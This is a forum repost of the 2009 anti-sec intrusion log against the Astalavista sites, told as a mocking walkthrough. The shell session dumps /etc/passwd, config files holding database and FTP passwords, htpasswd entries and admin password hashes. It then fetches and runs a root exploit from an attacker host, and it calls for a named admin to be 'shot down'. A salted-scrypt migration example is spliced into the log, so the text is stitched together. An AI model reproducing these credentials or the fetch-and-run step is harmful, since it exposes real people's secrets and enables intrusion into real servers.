Title: How Astalavista Got Owned
Author: admin  Time: 2012-11-6 21:07

There are two highlights in here. The first is the remotely obtained shell with apache user privileges. The banner is LiteSpeed, so it looks like this thing has a 0day, but then why is it running as the apache user? It turns out LiteSpeed is bundled together with Apache. I skimmed the introduction and its main feature is anti-DDoS. It seems somewhat interesting; I'll play with it later. For details see http://www.litespeedtech.com/litespeed-web-server-features.html.

[root@front3 ~]# curl -I litespeedtech.com
HTTP/1.1 200 OK
Date: Fri, 05 Jun 2009 22:54:51 GMT
Server: LiteSpeed

The other highlight is the localroot. If it wasn't udev, then there is yet another localroot 0day for RHEL5.3 x64 -_-

Some people say Astalavista got hacked because they were making money off milw0rm's material. I think that comes down to each person's own standards: some people pass off articles written by others as their own, and some turn other people's programs into their own. There is plenty of that around.

[ASCII-art banner: ASTALAVISTA]
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

From <http://astalavista.com/faq>:
>> 03. Who’s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

Why has Astalavista been targeted?

Other than the fact that they are not doing any of this for the “community” but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.

We wanted to see how good that “team of security and IT professionals” really is.

Let’s begin.

anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner...
LiteSpeed
[+] Injecting shellcode...
[-] Wait for it

[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)

sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com

sh-3.2$ pwd
/home/com/public_html

sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx--x--x 11 com com 4096 Jun 25 2008 ..
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx 2 com com 4096 May 19 00:50 config
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r--r-- 1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
-rw-r--r-- 1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
-rw-r--r-- 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r--r-- 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
-rw-r--r-- 1 com com 97496 Jun 2 13:01 index.php
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
-rw-r--r-- 1 com com 26 Feb 2 19:33 robots.txt
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
-rw-r--r-- 1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam

sh-3.2$ head -20 index.php
<?php

/**
 * The main page for the CMS
 * @copyright CONTREXX CMS - COMVATION AG
 * @author Comvation Development Team
 * @version v1.0.9.10.1 stable
 * @package contrexx
 * @subpackage core
 * @link http://www.contrexx.com/ contrexx homepage
 * @since v0.0.0.0
 * @todo Capitalize all class names in project
 * @uses /config/configuration.php
 * @uses /config/settings.php
 * @uses /config/version.php
 * @uses /core/API.php
 * @uses /core_modules/cache/index.class.php
 * @uses /core/error.class.php
 * @uses /core_modules/banner/index.class.php
 * @uses /core_modules/contact/index.class.php

sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx 2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php

sh-3.2$ cat configuration.php
[snip]
$_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost
$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name
$_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix
$_DBCONFIG['user'] = 'contrexxuser2'; // Database username
$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password
$_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)
[snip]
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$_FTPCONFIG['host'] = 'localhost';// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username
$_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password
$_FTPCONFIG['path'] = '/'; // Ftp path to cms

sh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
total 2913780
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
-rw-r--r-- 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r--r-- 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r--r-- 1 com com 115 Jan 29 2008 .htaccess

sh-3.2$ cat .htaccess
authType Basic
authName DVD
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user

sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg

mysql> select username,password,email from contrexx_access_users where is_admin = 1;
+------------+----------------------------------+-----------------------------+
| username   | password                         | email                       |
+------------+----------------------------------+-----------------------------+
| system     | 0defe9e458e745625fffbc215d7801c5 | info@comvation.com          |
| prozac     | 1f65f06d9758599e9ad27cf9707f92b5 | prozac@astalavista.com      |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | paulo.santos@astalavista.ch |
| schmid     | 0defe9e458e745625fffbc215d7801c5 | ivan.schmid@comvation.com   |
+------------+----------------------------------+-----------------------------+
4 rows in set (0.04 sec)

mysql> exit;
Bye

[~] There you go, your “team of security and IT professionals” is a joke.

[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.

[~] Lets move to astalavista.net now,

From <https://www.astalavista.net/>:
>> Everyone knows that the best defense is a good offense.
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
>> It's a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”

>> Go ahead, try and hack our server - in a completely legal way!
>> Learn by doing: We offer our members tricky tasks and challenges on an
>> ongoing basis so you can test your knowledge and abilities. You can also
>> demonstrate what you've mastered by taking part in regular hacker contests
>> and war games

[~] Lets take a look there, after all… they are hack-proof, aren’t they?!

[-] Tricky task: Find home dir of astalavista.net

sh-3.2$ ls -la ~astanet
total 48
drwx--x--x 6 astanet astanet 4096 Dec 23 15:55 .
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
-rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
-rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
-rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
-rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
-rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow

sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
sh-3.2$ ls -la
total 200
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 astanet@astalavista.com
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
-rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
-rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
-rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
-rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
-rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
-rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
-rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
-rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
-rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
-rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
-rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
-rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
-rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki

sh-3.2$ head -20 index.php
<?PHP
/**
 * Mainfile (external) for astalavistaNET v2.0
 *
 * @copyright Astalavista IT Engineering GmbH
 * @author Thomas Kaelin <thomas.kaelin@astalavista.ch>
 * @version 1.0
 */

if ($_SERVER['PHP_SELF'] == '/webcash.php') {
    $dontStartSession = false;
} else {
    $dontStartSession = true;
}
require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.class.php');
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.class.php');

sh-3.2$ cd config
sh-3.2$ ls -la
total 32
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
-rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
-rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
-rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
-rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php

sh-3.2$ cat com.conf.php
[snip]
//member-database
$_CONFIG['db_mem_server'] = 'localhost';
$_CONFIG['db_mem_database'] = 'astanet_membersystem';
$_CONFIG['db_mem_user'] = 'astanet_db';
$_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mem_debug'] = false; //true or false
//ads-database
$_CONFIG['db_ads_server'] = 'localhost';
$_CONFIG['db_ads_database'] = 'astanet_ads';
$_CONFIG['db_ads_user'] = 'astanet_db';
$_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
$_CONFIG['db_ads_debug'] = false; //true or false
//rainbow-database
$_CONFIG['db_rainbow_server'] = '212.254.194.163';
$_CONFIG['db_rainbow_database'] = 'rainbow';
$_CONFIG['db_rainbow_user'] = 'dinu';
$_CONFIG['db_rainbow_password'] = 'dinudinu';
$_CONFIG['db_rainbow_debug'] = false; //true or false
//mailing lists database
$_CONFIG['db_mailing_lists_server'] = 'localhost';
$_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
$_CONFIG['db_mailing_lists_user'] = 'astanet_db';
$_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
//paypal
$_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-bin/webscr';
$_CONFIG['sub_pp_cmd'] = '_xclick';
$_CONFIG['sub_pp_business'] = 'info@astalavista.net';
$_CONFIG['sub_pp_noship'] = '1';
$_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
[snip]

sh-3.2$ cd ..
sh-3.2$ cd member
sh-3.2$ ls -la
total 20
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
sh-3.2$ cat .htaccess
SecFilterEngine off

sh-3.2$ cd ..
sh-3.2$ cd cron
sh-3.2$ ls -la
total 168
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
-rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
-rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
-rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
-rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
-rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
-rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
-rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
-rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
-rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
-rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
-rw-r--r-- 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
-rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
-rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
-rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
-rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
-rw-r--r-- 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
-rw-r--r-- 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
-rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
-rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php

sh-3.2$ cd ..
sh-3.2$ cd _007
sh-3.2$ ls -la
total 24
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
-rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
-rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
-rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap

sh-3.2$ cat .htaccess
authType Basic
authName Admin
authUserFile /home/astanet/auth/.htadm_pwd
require valid-user

sh-3.2$ cat /home/astanet/auth/.htadm_pwd
admin2net:CR0bl65MwhfT

sh-3.2$ mysql -u astanet_db -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 275153
Server version: 5.0.45-community-log MySQL Community Edition (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+-----------------------+
| Database              |
+-----------------------+
| information_schema    |
| astanet_ads           |
| astanet_mailing_lists |
| astanet_mediawiki     |
| astanet_membersystem  |
| test                  |
+-----------------------+
6 rows in set (0.00 sec)

mysql> use astanet_membersystem
Database changed
mysql> show tables;
+-----------------------------------+
| Tables_in_astanet_membersystem    |
+-----------------------------------+
| blacklist_categories              |
| blacklist_content                 |
| blacklist_levels                  |
| blacklist_mcset                   |
| dir_categories                    |
| dir_comments                      |
| dir_links                         |
| dir_temp                          |
| dir_votes                         |
| documents                         |
| documents_categories              |
| email_content                     |
| email_settings                    |
| exploits                          |
| exploits_categories               |
| exploittree_categories            |
| exploittree_exploits              |
| home_values                       |
| iso_countries                     |
| links_categories                  |
| links_records                     |
| links_unauth                      |
| links_votes                       |
| log                               |
| news_categories                   |
| news_comments                     |
| news_emoticons                    |
| news_latest                       |
| news_messages                     |
| news_statistics                   |
| news_votes                        |
| prices_content                    |
| prices_offers                     |
| rss_settings                      |
| sessions                          |
| stats_signups                     |
| u2u2                              |
| u2u_contact                       |
| u2u_settings                      |
| user_keywords_selected_categories |
| users                             |
| users_ipn_test                    |
| users_keyword_values              |
| users_profile                     |
| users_temp                        |
| users_upgrade                     |
+-----------------------------------+
46 rows in set (0.00 sec)
mysql> describe users;
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
| Field                    | Type                                 | Null | Key | Default             | Extra          |
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |
| user                     | varchar(50)                          | NO   |     |                     |                |
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
| password                 | varchar(30)                          | NO   |     |                     |                |
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
| email                    | varchar(50)                          | NO   |     |                     |                |
| ip                       | varchar(15)                          | NO   |     | 0                   |                |
| proxy                    | set('0','1')                         | NO   |     | 0                   |                |
| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |
| checked                  | set('0','1','2')                     | NO   |     | 0                   |                |
| freemember               | set('0','1')                         | NO   |     | 0                   |                |
| ordertype                | set('transfer','wp','pp','mc','CnB') | YES  |     | NULL                |                |
| lang                     | tinytext                             | NO   |     |                     |                |
| adid                     | smallint(6)                          | NO   |     | 0                   |                |
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
+--------------------------+--------------------------------------+------+-----+---------------------+----------------+
22 rows in set (0.01 sec)

mysql> select count(*) as skids from users;
+-------+
| skids |
+-------+
| 25199 |
+-------+
1 row in set (0.00 sec)

mysql> select user,nickname,password,email from users where userlevel = 1;
27 rows in set (0.00 sec)

mysql> exit;
Bye

[~] plaintext passwords? yes,
Those so called “security professionals” who charge you $6.66 / month to
register at their hack-proof portal, save your passwords in plaintext…
brilliant!

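Added example (not part of the original zine and not Astalavista's code): the users table described above keeps password in a varchar(30) column, which is too short for any salted hash record, so the schema alone gives plaintext storage away. The sketch below migrates such a column to per-user salted scrypt records and checks logins against them; the SQLite stand-in table, the password_hash column, the function names, the cost parameters and the sample rows are all assumptions constructed for the example.

```python
import base64
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

# scrypt cost parameters (assumed values for this example; tune per host).
SCRYPT_N, SCRYPT_R, SCRYPT_P, KEY_LEN = 2**14, 8, 1, 32


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: scrypt$N$r$p$salt$key."""
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                         n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_LEN)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${_b64(salt)}${_b64(key)}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the key with the stored salt and parameters, compare in constant time."""
    try:
        scheme, n, r, p, salt_b64, key_b64 = record.split("$")
        if scheme != "scrypt":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(key_b64)
        actual = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                                n=int(n), r=int(r), p=int(p), dklen=len(expected))
    except ValueError:  # malformed record, bad base64 or bad parameters
        return False
    return hmac.compare_digest(actual, expected)


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the MySQL table: plaintext in a VARCHAR(30) column."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (primary_key INTEGER PRIMARY KEY, "
                 "user VARCHAR(50) NOT NULL, password VARCHAR(30) NOT NULL)")
    conn.executemany("INSERT INTO users (user, password) VALUES (?, ?)",
                     [("alice", "correct horse battery"),
                      ("bob", "hunter2"),
                      ("carol", "hunter2")])  # same password as bob on purpose
    conn.commit()
    return conn


def migrate_plaintext_column(conn: sqlite3.Connection) -> int:
    """Hash every plaintext password into password_hash and blank the old column."""
    columns = [row[1] for row in conn.execute("PRAGMA table_info(users)")]
    if "password_hash" not in columns:
        conn.execute("ALTER TABLE users ADD COLUMN password_hash TEXT")
    pending = conn.execute(
        "SELECT primary_key, password FROM users WHERE password_hash IS NULL"
    ).fetchall()
    with conn:  # one transaction: either every row is migrated or none
        for pk, plaintext in pending:
            conn.execute(
                "UPDATE users SET password_hash = ?, password = '' WHERE primary_key = ?",
                (hash_password(plaintext), pk))
    return len(pending)


def check_login(conn: sqlite3.Connection, user: str, password: str) -> bool:
    row = conn.execute("SELECT password_hash FROM users WHERE user = ?",
                       (user,)).fetchone()
    return row is not None and row[0] is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = build_demo_db()
    print("rows migrated:", migrate_plaintext_column(db))
    print("alice, right password:", check_login(db, "alice", "correct horse battery"))
    print("alice, wrong password:", check_login(db, "alice", "hunter2"))
```

After migration a dump of the table yields only salted records, and two users with the same password no longer share a stored value.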
[~] This been fun but we want more.

sh-3.2$ uname -a
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2$ wget http://anti.sec.labs/g0troot
--13:33:37-- http://anti.sec.labs/g0troot
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18200 (18K) [text/plain]
Saving to: `g0troot'

100%[=========================================================================================================================================>] 18,200 58.6K/s in 0.3s

18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]

[+] r00tr00t
[~] Executing shell...
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

sh-3.2# cat /etc/shadow
[snip]

sh-3.2# cat /etc/motd
#####################################################
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #
#|__| [__   |  |__| |    |__| |  | | [__   |  |__|  #
#|  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  |  #
#                                                   #
#####################################################
#                                                   #
# Admin Contact - support@secureservertech.com      #
#                                                   #
# Available ShortCuts                               #
#                                                   #
# nst - list active connections                     #
# ddos - shows how many times each ip is connected  #
# ltr - restart the webserver                       #
# phpc - edit the php config file                   #
# htc - edit the webserver configuration file       #
# up - uptime                                       #
# etd - edit the motd of the day file               #
# htr - start and restart apache if needed          #
# syng - shows active SYN_RECV connections          #
# synd - syn flood blocker - "synd -h" for usage    #
#####################################################
# NOTES:                                            #
# Last Upgrade - 12-08-2008 by JF                   #
# My.cnf/Mysql Optimization - 1-28-09               #
#                                                   #
#                                                   #
#                                                   #
#####################################################

sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
